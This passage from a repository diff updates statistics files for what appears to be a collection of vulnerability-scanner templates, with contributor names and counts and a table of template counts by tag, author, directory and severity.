security","count":1},{"name":"watchtowr","count":1},{"name":"gpiechnik2","count":1},{"name":"hateshape","count":1},{"name":"carlosvieira","count":1},{"name":"yashgoti","count":1},{"name":"jrolf","count":1},{"name":"aravind","count":1},{"name":"am0nt31r0","count":1},{"name":"wabafet","count":1},{"name":"danfaizer","count":1},{"name":"lixts","count":1},{"name":"luskabol","count":1},{"name":"unknown","count":1},{"name":"sicksec","count":1},{"name":"kailashbohara","count":1},{"name":"af001","count":1},{"name":"jas37","count":1},{"name":"adnanekhan","count":1},{"name":"zandros0","count":1},{"name":"abdullahisik","count":1},{"name":"abbas.heybati","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"unkl4b","count":1},{"name":"philippdelteil","count":1},{"name":"husain","count":1},{"name":"mordavid","count":1},{"name":"evolutionsec","count":1},{"name":"domenicoveneziano","count":1},{"name":"qianbenhyu","count":1},{"name":"yuansec","count":1},{"name":"brianlam38","count":1},{"name":"wlayzz","count":1},{"name":"chron0x","count":1},{"name":"rivalsec","count":1},{"name":"makyotox","count":1},{"name":"shiar","count":1},{"name":"0xh7ml","count":1},{"name":"0xceeb","count":1},{"name":"juliosmelo","count":1},{"name":"piyushchhiroliya","count":1},{"name":"geraldino2","count":1},{"name":"orpheus","count":1},{"name":"savik","count":1},{"name":"jeya.seelan","count":1},{"name":"schniggie","count":1},{"name":"retr0","count":1},{"name":"rumble773","count":1},{"name":"mammad_rahimzada","count":1},{"name":"kareemse1im","count":1},{"name":"sak1","count":1},{"name":"toufik-airane","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"tangxiaofeng7","count":1},{"name":"vinit989","count":1},{"name":"jcockhren","count":1},{"name":"kiks7","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"elouhi","count":1},{"name":"olewagner","count":1},{"name":"dale clarke","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"push4d","count":1},{"name":"p-l-","count":1},{"name":"paper-pen","count":1},{"name":"sinsinology","count":1},{"name":"unblvr1","count":1},{"name":"ap3r","count":1},{"name":"ringo","count":1},{"name":"ramkrishna sawant","count":1},{"name":"aresx","count":1},{"name":"sospiro","count":1},{"name":"null_hypothesis","count":1},{"name":"liquidsec","count":1},{"name":"open-sec","count":1},{"name":"momen eldawakhly","count":1},{"name":"lamscun","count":1},{"name":"h4kux","count":1},{"name":"andysvints","count":1},{"name":"ling","count":1},{"name":"w8ay","count":1},{"name":"b0rn2r00t","count":1},{"name":"dorkerdevil","count":1},{"name":"youngpope","count":1},{"name":"bywalks","count":1},{"name":"mohammedsaneem","count":1},{"name":"dmartyn","count":1},{"name":"sshell","count":1},{"name":"dhiyanesdk","count":1},{"name":"amir-h-fallahi","count":1},{"name":"ramondunker","count":1},{"name":"vikas kundu","count":1},{"name":"west-wise","count":1},{"name":"lrtk-coder","count":1},{"name":"sdcampbell","count":1},{"name":"opencirt","count":1},{"name":"queencitycyber","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"stupidfish","count":1},{"name":"andirrahmani1","count":1},{"name":"1nf1n7y","count":1},{"name":"tehtbl","count":1},{"name":"banana69","count":1},{"name":"mys7ic","count":1},{"name":"rubina119","count":1},{"name":"hardik-rathod","count":1},{"name":"5up3r541y4n","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"soyelmago","count":1},{"name":"m0ck3d","count":1},{"name":"dk999","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"floriandewald","count":1},{"name":"iampritam","count":1},{"name":"0xtavian","count":1},{"name":"phillipo","count":1},{"name":"kr1shna4garwal","count":1},{"name":"arjunchandarana","count":1},{"name":"amirmsafari","count":1},{"name":"kresec","count":1},{"name":"izn0u","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"ptonewreckin","count":1},{"name":"metascan","count":1},{"name":"godfatherorwa","count":1},{"name":"denandz","count":1},{"name":"tirtha_mandal","count":1},{"name":"josecosta","count":1},{"name":"freakyclown","count":1},{"name":"d4ly","count":1},{"name":"0xprial","count":1},{"name":"yiran","count":1},{"name":"therealtoastycat","count":1},{"name":"becivells","count":1},{"name":"notsoevilweasel","count":1},{"name":"manasmbellani","count":1},{"name":"mariam tariq","count":1},{"name":"apple","count":1},{"name":"nytr0gen","count":1},{"name":"rotemreiss","count":1},{"name":"hüseyin tintaş","count":1},{"name":"bughuntersurya","count":1},{"name":"bad5ect0r","count":1},{"name":"kiransau","count":1},{"name":"ph33rr","count":1},{"name":"miryangjung","count":1},{"name":"xcapri","count":1},{"name":"akokonunes","count":1},{"name":"omarkurt","count":1},{"name":"pudsec","count":1},{"name":"pwnwithlove","count":1},{"name":"sickwell","count":1},{"name":"arr0way","count":1},{"name":"vthiery","count":1},{"name":"cravaterouge","count":1},{"name":"infosecsanyam","count":1},{"name":"sherlocksecurity","count":1},{"name":"sorrowx3","count":1},{"name":"alevsk","count":1},{"name":"zsusac","count":1},{"name":"mantissts","count":1},{"name":"mukundbhuva","count":1},{"name":"jbertman","count":1},{"name":"shiva (strobes security)","count":1},{"name":"s1r1u5_","count":1},{"name":"apt-mirror","count":1},{"name":"sw0rk17","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"duty_1g","count":1},{"name":"natto97","count":1},{"name":"hakimkt","count":1},{"name":"palanichamy_perumal","count":1},{"name":"naglis","count":1},{"name":"lethargynavigator","count":1},{"name":"staticnoise","count":1},{"name":"technicaljunkie","count":1},{"name":"nerrorsec","count":1},{"name":"thebinitghimire","count":1},{"name":"exploitation","count":1},{"name":"remonsec","count":1},{"name":"narluin","count":1},{"name":"alexrydzak","count":1},{"name":"rotembar","count":1},{"name":"kurohost","count":1},{"name":"drfabiocastro","count":1},{"name":"zn9988","count":1},{"name":"high","count":1},{"name":"breno_css","count":1},{"name":"nielsing","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"aaronchen0","count":1},{"name":"_c0wb0y_","count":1},{"name":"alperenkesk","count":1},{"name":"fopina","count":1},{"name":"notwhy","count":1},{"name":"mbmy","count":1},{"name":"h4sh5","count":1},{"name":"j33n1k4","count":1},{"name":"hotpot","count":1},{"name":"elder tao","count":1},{"name":"skylark-lab","count":1},{"name":"whynotke","count":1},{"name":"0xcharan","count":1},{"name":"amanrawat","count":1},{"name":"aringo-bf","count":1},{"name":"compr00t","count":1},{"name":"jna1","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"screamy","count":1},{"name":"0xparth","count":1},{"name":"danigoland","count":1},{"name":"zhenwarx","count":1},{"name":"wpsec","count":1},{"name":"caon","count":1},{"name":"shreyapohekar","count":1},{"name":"micha3lb3n","count":1},{"name":"knassar702","count":1},{"name":"0xrod","count":1},{"name":"mlec","count":1},{"name":"mesaglio","count":1},{"name":"noamrathaus","count":1},{"name":"th3r4id","count":1},{"name":"myst7ic","count":1},{"name":"whotwagner","count":1},{"name":"nuts7","count":1},{"name":"dali","count":1},{"name":"puben","count":1},{"name":"ahmed abou-ela","count":1},{"name":"ndmalc","count":1},{"name":"pepitoh","count":1},{"name":"udyz","count":1},{"name":"jbaines-r7","count":1},{"name":"xshuden","count":1},{"name":"hyunsoo-ds","count":1},{"name":"juicypotato1","count":1},{"name":"fur1na","count":1},{"name":"arall","count":1},{"name":"akash.c","count":1},{"name":"djoevanka","count":1},{"name":"anon-artist","count":1},{"name":"ola456","count":1},{"name":"eremit4","count":1},{"name":"irshadahamed","count":1},{"name":"smaranchand","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"patrick pirker","count":1},{"name":"adilsoybali","count":1},{"name":"th3.d1p4k","count":1},{"name":"christbowel","count":1},{"name":"udinchan","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"fmunozs","count":1},{"name":"arqsz","count":1},{"name":"chetgan","count":1},{"name":"phyr3wall","count":1},{"name":"nobody","count":1},{"name":"ldionmarcil","count":1},{"name":"ledoubletake","count":1},{"name":"yavolo","count":1},{"name":"yusakie","count":1},{"name":"alex","count":1},{"name":"ofjaaah","count":1},{"name":"r3nz0","count":1},{"name":"aayush vishnoi","count":1},{"name":"axrk","count":1},{"name":"mayankpandey01","count":1},{"name":"hakluke","count":1},{"name":"elmahdi","count":1},{"name":"tea","count":1},{"name":"michal-mikolas","count":1},{"name":"0xceba","count":1},{"name":"aaban solutions","count":1},{"name":"noah @thesubtlety","count":1},{"name":"evan rubinstien","count":1},{"name":"couskito","count":1},{"name":"mihhailsokolov","count":1}],"directory":[{"name":"http","count":7593},{"name":"file","count":402},{"name":"workflows","count":191},{"name":"network","count":135},{"name":"cloud","count":134},{"name":"code","count":81},{"name":"javascript","count":60},{"name":"ssl","count":29},{"name":"dns","count":22},{"name":"dast","count":22},{"name":"headless","count":12},{"name":"passive","count":1},{"name":"cves.json","count":1},{"name":"contributors.json","count":1},{"name":"TEMPLATES-STATS.json","count":1}],"severity":[{"name":"info","count":3780},{"name":"high","count":1786},{"name":"medium","count":1560},{"name":"critical","count":1058},{"name":"low","count":268},{"name":"unknown","count":39}],"types":[{"name":"file","count":402},{"name":"dns","count":25}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 0a0fd735c2..047875ee65 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,5507 +1,5583 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 2511 | dhiyaneshdk | 1322 | http | 7547 | info | 3697 | file | 337 | -| panel | 1157 | daffainfo | 865 | file | 337 | high | 1770 | dns | 25 | -| wordpress | 983 | dwisiswant0 | 803 | workflows | 191 | medium | 1528 | | | -| exposure | 948 | pussycat0x | 362 | network | 134 | critical | 1044 | | | -| xss | 911 | ritikchaddha | 354 | cloud | 99 | low | 265 | | | -| wp-plugin | 852 | pikpikcu | 353 | code | 81 | unknown | 39 | | | -| osint | 804 | pdteam | 297 | javascript | 60 | | | | | -| tech | 686 | princechaddha | 269 | ssl | 29 | | | | | -| lfi | 662 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 659 | geeknik | 231 | dast | 21 | | | | | -| rce | 600 | theamanrawat | 223 | headless | 12 | | | | | -| edb | 599 | r3y3r53 | 200 | passive | 1 | | | | | -| packetstorm | 544 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | -| wpscan | 502 | gy741 | 158 | cves.json | 1 | | | | | -| cve2021 | 491 | righettod | 149 | contributors.json | 1 | | | | | -| cve2022 | 479 | rxerium | 142 | | | | | | | -| wp | 426 | sleepingbag945 | 132 | | | | | | | -| cve2023 | 380 | arafatansari | 118 | | | | | | | -| unauth | 367 | tess | 109 | | | | | | | -| sqli | 364 | pdresearch | 84 | | | | | | | -| file | 346 | iamnoooob | 69 | | | | | | | +| cve | 2540 | dhiyaneshdk | 1334 | http | 7593 | info | 3780 | file | 402 | +| panel | 1163 | daffainfo | 864 | file | 402 | high | 1786 | dns | 25 | +| wordpress | 996 | dwisiswant0 | 803 | workflows | 191 | medium | 1560 | | | +| exposure | 955 | pussycat0x | 430 | network | 135 | critical | 1058 | | | +| xss | 913 | ritikchaddha | 366 | cloud | 134 | low | 268 | | | +| wp-plugin | 865 | pikpikcu | 353 | code | 81 | unknown | 39 | | | +| osint | 804 | princechaddha | 303 | javascript | 60 | | | | | +| tech | 694 | pdteam | 297 | ssl | 29 | | | | | +| lfi | 670 | ricardomaia | 238 | dast | 22 | | | | | +| misconfig | 660 | geeknik | 231 | dns | 22 | | | | | +| rce | 610 | theamanrawat | 213 | headless | 12 | | | | | +| edb | 597 | r3y3r53 | 199 | cves.json | 1 | | | | | +| packetstorm | 542 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | +| wpscan | 505 | gy741 | 158 | contributors.json | 1 | | | | | +| cve2021 | 493 | righettod | 156 | passive | 1 | | | | | +| cve2022 | 472 | rxerium | 145 | | | | | | | +| wp | 431 | sleepingbag945 | 132 | | | | | | | +| cve2023 | 384 | arafatansari | 118 | | | | | | | +| unauth | 368 | tess | 109 | | | | | | | +| sqli | 361 | pdresearch | 84 | | | | | | | +| file | 345 | iamnoooob | 69 | | | | | | | | authenticated | 343 | idealphase | 66 | | | | | | | -| intrusive | 302 | madrobot | 65 | | | | | | | -| detect | 295 | zzeitlin | 64 | | | | | | | -| login | 284 | rootxharsh | 62 | | | | | | | +| intrusive | 310 | madrobot | 65 | | | | | | | +| detect | 308 | zzeitlin | 64 | | | | | | | +| login | 295 | rootxharsh | 62 | | | | | | | | kev | 275 | akincibor | 59 | | | | | | | -| cve2020 | 257 | for3stco1d | 55 | | | | | | | -| token-spray | 243 | philippedelteil | 53 | | | | | | | -| oast | 222 | johnk3r | 42 | | | | | | | -| config | 221 | edoardottt | 42 | | | | | | | -| default-login | 216 | gaurang | 42 | | | | | | | -| top-200 | 215 | c-sh0 | 35 | | | | | | | -| osint-social | 210 | j4vaovo | 35 | | | | | | | -| network | 195 | adam crosser | 31 | | | | | | | -| token | 193 | luisfelipe146 | 31 | | | | | | | -| apache | 191 | ice3man | 29 | | | | | | | -| | 191 | mastercho | 29 | | | | | | | -| devops | 177 | pwnhxl | 28 | | | | | | | -| cve2018 | 170 | hardik-solanki | 24 | | | | | | | -| iot | 167 | organiccrap | 24 | | | | | | | -| cve2019 | 164 | techbrunchfr | 23 | | | | | | | -| keys | 156 | harsh | 23 | | | | | | | -| joomla | 148 | ctflearner | 23 | | | | | | | -| install | 147 | ffffffff0x | 22 | | | | | | | -| malware | 142 | userdehghani | 22 | | | | | | | -| tcp | 136 | parthmalhotra | 20 | | | | | | | -| redirect | 135 | kazgangap | 19 | | | | | | | -| cloud | 134 | cckuailong | 18 | | | | | | | -| aws | 134 | sullo | 18 | | | | | | | -| auth-bypass | 133 | lu4nx | 17 | | | | | | | -| ssrf | 119 | bhutch | 17 | | | | | | | -| phishing | 117 | 0xpugazh | 16 | | | | | | | -| amazon | 117 | random-robbie | 16 | | | | | | | -| cms | 113 | shaikhyaser | 16 | | | | | | | -| files | 113 | sheikhrishad | 15 | | | | | | | -| cve2010 | 112 | pr3r00t | 15 | | | | | | | -| cve2017 | 110 | unapibageek | 15 | | | | | | | +| cve2020 | 255 | for3stco1d | 55 | | | | | | | +| token-spray | 243 | philippedelteil | 52 | | | | | | | +| oast | 222 | johnk3r | 44 | | | | | | | +| config | 221 | gaurang | 42 | | | | | | | +| top-200 | 221 | edoardottt | 40 | | | | | | | +| default-login | 217 | c-sh0 | 35 | | | | | | | +| devops | 212 | j4vaovo | 34 | | | | | | | +| osint-social | 210 | luisfelipe146 | 31 | | | | | | | +| malware | 208 | adam crosser | 31 | | | | | | | +| network | 196 | ice3man | 29 | | | | | | | +| apache | 193 | mastercho | 29 | | | | | | | +| token | 193 | pwnhxl | 28 | | | | | | | +| | 191 | hardik-solanki | 24 | | | | | | | +| cve2018 | 170 | organiccrap | 24 | | | | | | | +| cloud | 169 | ctflearner | 23 | | | | | | | +| iot | 167 | techbrunchfr | 23 | | | | | | | +| cve2019 | 163 | harsh | 23 | | | | | | | +| keys | 156 | userdehghani | 22 | | | | | | | +| joomla | 148 | ffffffff0x | 22 | | | | | | | +| install | 147 | kazgangap | 20 | | | | | | | +| redirect | 138 | parthmalhotra | 20 | | | | | | | +| tcp | 137 | cckuailong | 18 | | | | | | | +| aws | 135 | sullo | 18 | | | | | | | +| auth-bypass | 133 | bhutch | 17 | | | | | | | +| ssrf | 120 | lu4nx | 17 | | | | | | | +| amazon | 118 | random-robbie | 16 | | | | | | | +| phishing | 117 | shaikhyaser | 16 | | | | | | | +| cve2024 | 114 | 0xpugazh | 16 | | | | | | | +| files | 113 | pr3r00t | 15 | | | | | | | +| cms | 113 | sheikhrishad | 15 | | | | | | | +| cve2010 | 112 | unapibageek | 15 | | | | | | | +| cve2017 | 110 | tenbird | 14 | | | | | | | | router | 108 | dogasantos | 14 | | | | | | | -| top-100 | 100 | milo2012 | 14 | | | | | | | -| aws-cloud-config | 90 | r3dg33k | 14 | | | | | | | -| disclosure | 89 | tenbird | 14 | | | | | | | -| linux | 85 | sharath | 13 | | | | | | | -| cve2024 | 81 | melbadry9 | 13 | | | | | | | -| code | 81 | 0ri2n | 13 | | | | | | | -| local | 80 | nullfuzz | 13 | | | | | | | -| seclists | 79 | theabhinavgaur | 13 | | | | | | | +| top-100 | 100 | securityforeveryone | 14 | | | | | | | +| aws-cloud-config | 91 | milo2012 | 14 | | | | | | | +| disclosure | 89 | r3dg33k | 14 | | | | | | | +| linux | 85 | nullfuzz | 13 | | | | | | | +| code | 81 | theabhinavgaur | 13 | | | | | | | +| local | 80 | melbadry9 | 13 | | | | | | | +| seclists | 79 | sharath | 13 | | | | | | | +| privesc | 79 | 0ri2n | 13 | | | | | | | | takeover | 79 | elsfa7110 | 13 | | | | | | | -| privesc | 79 | meme-lord | 12 | | | | | | | -| tokens | 78 | suman_kar | 12 | | | | | | | -| fileupload | 76 | kazet | 12 | | | | | | | -| oracle | 73 | cyllective | 11 | | | | | | | +| tokens | 78 | kazet | 12 | | | | | | | +| fileupload | 76 | suman_kar | 12 | | | | | | | +| oracle | 74 | meme-lord | 12 | | | | | | | +| kubernetes | 71 | cyllective | 11 | | | | | | | | oss | 68 | wdahlenb | 11 | | | | | | | -| js | 67 | logicalhunter | 10 | | | | | | | -| cisco | 67 | co5mos | 10 | | | | | | | -| enum | 65 | random_robbie | 10 | | | | | | | -| adobe | 63 | nadino | 10 | | | | | | | -| ir | 61 | 0x240x23elu | 10 | | | | | | | +| js | 67 | co5mos | 10 | | | | | | | +| cisco | 67 | nadino | 10 | | | | | | | +| enum | 65 | hackergautam | 10 | | | | | | | +| adobe | 63 | logicalhunter | 10 | | | | | | | +| k8s | 62 | 0x240x23elu | 10 | | | | | | | +| ir | 61 | random_robbie | 10 | | | | | | | | huntr | 60 | alph4byt3 | 10 | | | | | | | -| cve2015 | 59 | hackergautam | 10 | | | | | | | -| atlassian | 59 | fabaff | 9 | | | | | | | -| cve2016 | 57 | olearycrew | 9 | | | | | | | -| vmware | 56 | momika233 | 9 | | | | | | | +| cve2015 | 59 | momika233 | 9 | | | | | | | +| atlassian | 59 | emadshanab | 9 | | | | | | | +| detection | 57 | initstring | 9 | | | | | | | +| cve2016 | 57 | fabaff | 9 | | | | | | | +| vmware | 56 | olearycrew | 9 | | | | | | | | google | 56 | oppsec | 9 | | | | | | | -| detection | 56 | adamcrosser | 9 | | | | | | | -| c2 | 55 | emadshanab | 9 | | | | | | | -| logs | 48 | initstring | 9 | | | | | | | -| tenable | 48 | aashiq | 8 | | | | | | | -| log4j | 47 | that_juan_ | 8 | | | | | | | -| hackerone | 46 | noraj | 8 | | | | | | | -| vulhub | 46 | irshad ahamed | 8 | | | | | | | -| osint-gaming | 45 | _0xf4n9x_ | 8 | | | | | | | -| aem | 45 | iamthefrogy | 8 | | | | | | | -| php | 45 | veshraj | 8 | | | | | | | -| jndi | 44 | zh | 8 | | | | | | | -| debug | 44 | divya_mudgal | 7 | | | | | | | -| cve2014 | 44 | harshbothra_ | 7 | | | | | | | -| generic | 43 | huta0 | 7 | | | | | | | -| deserialization | 43 | amit-jd | 7 | | | | | | | -| traversal | 42 | nodauf | 7 | | | | | | | -| osint-porn | 42 | dr_set | 7 | | | | | | | -| oa | 42 | tarunkoyalwar | 7 | | | | | | | -| osint-hobby | 42 | randomstr1ng | 7 | | | | | | | -| microsoft | 42 | caspergn | 7 | | | | | | | -| plugin | 42 | me_dheeraj | 7 | | | | | | | +| c2 | 55 | adamcrosser | 9 | | | | | | | +| tenable | 48 | that_juan_ | 8 | | | | | | | +| logs | 48 | noraj | 8 | | | | | | | +| log4j | 47 | irshad ahamed | 8 | | | | | | | +| vulhub | 46 | _0xf4n9x_ | 8 | | | | | | | +| hackerone | 46 | iamthefrogy | 8 | | | | | | | +| osint-gaming | 45 | aashiq | 8 | | | | | | | +| php | 45 | zh | 8 | | | | | | | +| aem | 45 | veshraj | 8 | | | | | | | +| debug | 44 | randomstr1ng | 7 | | | | | | | +| jndi | 44 | nodauf | 7 | | | | | | | +| cve2014 | 44 | caspergn | 7 | | | | | | | +| generic | 44 | its0x08 | 7 | | | | | | | +| deserialization | 43 | divya_mudgal | 7 | | | | | | | +| traversal | 42 | amit-jd | 7 | | | | | | | +| microsoft | 42 | huta0 | 7 | | | | | | | +| oa | 42 | kophjager007 | 7 | | | | | | | +| osint-porn | 42 | tarunkoyalwar | 7 | | | | | | | +| plugin | 42 | leovalcante | 7 | | | | | | | +| osint-hobby | 42 | dr_set | 7 | | | | | | | +| cnvd | 41 | techryptic (@tech) | 7 | | | | | | | +| springboot | 41 | harshbothra_ | 7 | | | | | | | +| misc | 40 | nvn1729 | 6 | | | | | | | +| miscellaneous | 38 | evan rubinstein | 6 | | | | | | | +| injection | 38 | puzzlepeaches | 6 | | | | | | | +| listing | 38 | ja1sh | 6 | | | | | | | +| jira | 37 | xelkomy | 6 | | | | | | | +| cti | 36 | praetorian-thendrickson | 6 | | | | | | | +| ibm | 36 | me_dheeraj | 6 | | | | | | | | | | (https://twitter.com/dheerajmadhukar) | | | | | | | | -| springboot | 41 | leovalcante | 7 | | | | | | | -| cnvd | 41 | kophjager007 | 7 | | | | | | | -| misc | 40 | techryptic (@tech) | 7 | | | | | | | -| miscellaneous | 38 | its0x08 | 7 | | | | | | | -| injection | 38 | forgedhallpass | 6 | | | | | | | -| jira | 37 | gitlab red team | 6 | | | | | | | -| listing | 37 | megamansec | 6 | | | | | | | -| kubernetes | 37 | devang-solanki | 6 | | | | | | | -| ibm | 36 | pathtaga | 6 | | | | | | | -| cti | 36 | hahwul | 6 | | | | | | | -| osint-misc | 35 | pentest_swissky | 6 | | | | | | | -| sap | 34 | xelkomy | 6 | | | | | | | -| fuzz | 34 | byt3bl33d3r | 6 | | | | | | | -| ssl | 33 | puzzlepeaches | 6 | | | | | | | -| tls | 32 | lucky0x0d | 6 | | | | | | | -| osint-tech | 31 | praetorian-thendrickson | 6 | | | | | | | -| dlink | 30 | imnightmaree | 6 | | | | | | | -| wp-theme | 30 | evan rubinstein | 6 | | | | | | | -| ec2 | 30 | justaacat | 6 | | | | | | | -| osint-coding | 30 | ja1sh | 6 | | | | | | | -| gitlab | 28 | __fazal | 6 | | | | | | | -| k8s | 28 | clem9669 | 6 | | | | | | | -| fortinet | 28 | r3naissance | 5 | | | | | | | -| api | 28 | r12w4n | 5 | | | | | | | -| dns | 27 | panch0r3d | 5 | | | | | | | -| citrix | 27 | yanyun | 5 | | | | | | | -| proxy | 27 | ganofins | 5 | | | | | | | -| bestwebsoft | 27 | robotshell | 5 | | | | | | | -| firewall | 26 | powerexploit | 5 | | | | | | | -| cve2012 | 26 | pulsesecurity.co.nz | 5 | | | | | | | -| ssh | 26 | andreluna | 5 | | | | | | | -| zohocorp | 26 | vicrack | 5 | | | | | | | -| lfr | 26 | kh4sh3i | 5 | | | | | | | -| manageengine | 25 | prajiteshsingh | 5 | | | | | | | +| osint-misc | 35 | gitlab red team | 6 | | | | | | | +| fuzz | 34 | justaacat | 6 | | | | | | | +| k8s-cluster-security | 34 | devang-solanki | 6 | | | | | | | +| sap | 34 | __fazal | 6 | | | | | | | +| ssl | 33 | byt3bl33d3r | 6 | | | | | | | +| devsecops | 32 | clem9669 | 6 | | | | | | | +| tls | 32 | hahwul | 6 | | | | | | | +| osint-tech | 31 | lucky0x0d | 6 | | | | | | | +| dlink | 31 | imnightmaree | 6 | | | | | | | +| ec2 | 30 | pathtaga | 6 | | | | | | | +| wp-theme | 30 | megamansec | 6 | | | | | | | +| osint-coding | 30 | forgedhallpass | 6 | | | | | | | +| fortinet | 28 | pentest_swissky | 6 | | | | | | | +| api | 28 | yanyun | 5 | | | | | | | +| gitlab | 28 | robotshell | 5 | | | | | | | +| lfr | 27 | isacaya | 5 | | | | | | | +| bestwebsoft | 27 | joanbono | 5 | | | | | | | +| proxy | 27 | prajiteshsingh | 5 | | | | | | | +| citrix | 27 | defr0ggy | 5 | | | | | | | +| dns | 27 | r3naissance | 5 | | | | | | | +| cve2012 | 26 | s0obi | 5 | | | | | | | +| ssh | 26 | r12w4n | 5 | | | | | | | +| zohocorp | 26 | gtrrnr | 5 | | | | | | | +| firewall | 26 | kh4sh3i | 5 | | | | | | | +| file-upload | 25 | your3cho | 5 | | | | | | | | weaver | 25 | podalirius | 5 | | | | | | | -| admin | 24 | defr0ggy | 5 | | | | | | | -| osint-shopping | 24 | gtrrnr | 5 | | | | | | | -| osint-finance | 24 | shine | 5 | | | | | | | -| osint-images | 24 | arm!tage | 5 | | | | | | | -| osint-business | 24 | joanbono | 5 | | | | | | | -| zoho | 24 | s0obi | 5 | | | | | | | -| file-upload | 23 | your3cho | 5 | | | | | | | -| audit | 23 | mr-xn | 5 | | | | | | | -| stored-xss | 23 | shankar acharya | 4 | | | | | | | -| yonyou | 23 | iamnooob | 4 | | | | | | | -| xxe | 23 | tanq16 | 4 | | | | | | | -| tomcat | 23 | dadevel | 4 | | | | | | | -| github | 22 | ggranjus | 4 | | | | | | | -| s3 | 22 | m4lwhere | 4 | | | | | | | -| prestashop | 22 | jpg0mez | 4 | | | | | | | -| cicd | 22 | wisnupramoedya | 4 | | | | | | | -| ecology | 21 | 3th1c_yuk1 | 4 | | | | | | | -| weblogic | 21 | incogbyte | 4 | | | | | | | -| printer | 21 | k0pak4 | 4 | | | | | | | -| dast | 21 | heeress | 4 | | | | | | | -| msf | 21 | ice3man543 | 4 | | | | | | | -| ftp | 20 | lum8rjack | 4 | | | | | | | -| jenkins | 20 | xxcdd | 4 | | | | | | | -| camera | 20 | 0xr2r | 4 | | | | | | | -| struts | 19 | scent2d | 4 | | | | | | | -| rukovoditel | 19 | dolev farhi | 4 | | | | | | | -| grafana | 19 | flx | 4 | | | | | | | +| manageengine | 25 | ganofins | 5 | | | | | | | +| osint-images | 24 | vicrack | 5 | | | | | | | +| admin | 24 | powerexploit | 5 | | | | | | | +| osint-business | 24 | mr-xn | 5 | | | | | | | +| osint-shopping | 24 | arm!tage | 5 | | | | | | | +| osint-finance | 24 | pulsesecurity.co.nz | 5 | | | | | | | +| zoho | 24 | shine | 5 | | | | | | | +| xxe | 23 | andreluna | 5 | | | | | | | +| stored-xss | 23 | panch0r3d | 5 | | | | | | | +| tomcat | 23 | iamnooob | 4 | | | | | | | +| audit | 23 | shankar acharya | 4 | | | | | | | +| yonyou | 23 | scent2d | 4 | | | | | | | +| github | 22 | k0pak4 | 4 | | | | | | | +| prestashop | 22 | nybble04 | 4 | | | | | | | +| cicd | 22 | 0xr2r | 4 | | | | | | | +| dast | 22 | incogbyte | 4 | | | | | | | +| s3 | 22 | wisnupramoedya | 4 | | | | | | | +| ecology | 21 | ice3man543 | 4 | | | | | | | +| weblogic | 21 | m4lwhere | 4 | | | | | | | +| printer | 21 | e_schultze_ | 4 | | | | | | | +| msf | 21 | ggranjus | 4 | | | | | | | +| camera | 20 | 3th1c_yuk1 | 4 | | | | | | | +| ftp | 20 | h1ei1 | 4 | | | | | | | +| jenkins | 20 | heeress | 4 | | | | | | | | wavlink | 19 | king-alexander | 4 | | | | | | | -| hp | 19 | e_schultze_ | 4 | | | | | | | -| confluence | 19 | cookiehanhoan | 4 | | | | | | | -| android | 18 | nybble04 | 4 | | | | | | | -| osint-music | 18 | h1ei1 | 4 | | | | | | | -| node.js | 18 | whoever | 3 | | | | | | | -| ruijie | 18 | e1a | 3 | | | | | | | -| vpn | 18 | atomiczsec | 3 | | | | | | | -| cve2011 | 18 | omranisecurity | 3 | | | | | | | -| coldfusion | 18 | thomas_from_offensity | 3 | | | | | | | -| mail | 17 | matt galligan | 3 | | | | | | | -| microweber | 17 | j3ssie | 3 | | | | | | | +| grafana | 19 | lum8rjack | 4 | | | | | | | +| struts | 19 | dolev farhi | 4 | | | | | | | +| confluence | 19 | dadevel | 4 | | | | | | | +| hp | 19 | tanq16 | 4 | | | | | | | +| rukovoditel | 19 | flx | 4 | | | | | | | +| apt | 19 | xxcdd | 4 | | | | | | | +| osint-music | 18 | cookiehanhoan | 4 | | | | | | | +| coldfusion | 18 | jpg0mez | 4 | | | | | | | +| android | 18 | 0xkayala | 3 | | | | | | | +| node.js | 18 | canberbamber | 3 | | | | | | | +| cve2011 | 18 | coldfish | 3 | | | | | | | +| vpn | 18 | omranisecurity | 3 | | | | | | | +| ruijie | 18 | lark-lab | 3 | | | | | | | | headless | 17 | evergreencartoons | 3 | | | | | | | -| azure | 17 | fxploit | 3 | | | | | | | -| honeypot | 17 | dr0pd34d | 3 | | | | | | | -| nginx | 17 | vagnerd | 3 | | | | | | | -| backup | 16 | binaryfigments | 3 | | | | | | | -| jarm | 16 | jarijaas | 3 | | | | | | | -| cve2009 | 16 | aringo | 3 | | | | | | | -| service | 16 | mavericknerd | 3 | | | | | | | -| rconfig | 16 | davidmckennirey | 3 | | | | | | | -| alibaba | 16 | z3bd | 3 | | | | | | | -| osint-blog | 16 | fyoorer | 3 | | | | | | | -| backdoor | 16 | andydoering | 3 | | | | | | | -| status | 16 | skeltavik | 3 | | | | | | | -| magento | 16 | johnjhacking | 3 | | | | | | | -| woocommerce | 15 | coldfish | 3 | | | | | | | -| redhat | 15 | taielab | 3 | | | | | | | -| ruby | 15 | imjust0 | 3 | | | | | | | -| netgear | 15 | splint3r7 | 3 | | | | | | | -| cve2008 | 15 | randomrobbie | 3 | | | | | | | -| cnvd2021 | 15 | _generic_human_ | 3 | | | | | | | -| seeyon | 15 | salts | 3 | | | | | | | -| setup | 15 | cheesymoon | 3 | | | | | | | -| cve2013 | 15 | dudez | 3 | | | | | | | -| installer | 15 | 